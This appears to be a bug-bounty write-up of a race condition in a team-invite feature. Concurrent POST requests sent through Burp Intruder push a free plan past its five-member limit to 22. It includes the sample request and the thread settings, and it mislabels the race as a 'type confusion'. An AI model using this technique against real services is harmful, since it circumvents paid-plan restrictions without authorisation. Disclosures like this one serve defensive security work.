Race Condition bypassing team limit


Severity: Medium

Complexity: Easy

Weakness: Race condition


  • While testing one of the application, they have functionality to create team and invite user’s to team .
  • they have free limit of inviting 5 user’s to team.If you want to invite more user’s , they will ask you to upgrade you’r plan to pro.
  • Request while adding member to our team.
  • Request:

POST /account/work/team/ HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site.com/home/work/team/manage
Content-Length: 108
Cookie: <REDACTED>
Connection: close

emails=xxxxxxx@gmail.com&team=name&authenticity_token=<>

  • Sending the Request to Burp Intruder By Adding Email List to emails= Parameter.
  • Setting Minimum Thread Speed(10–15) and Start Attack.
  • Result:
Bypassed the limit to 22
  • Increasing Threading to ~10 will send 10 request’s at the same time. this will generate a type confusion which bypassed their team limit.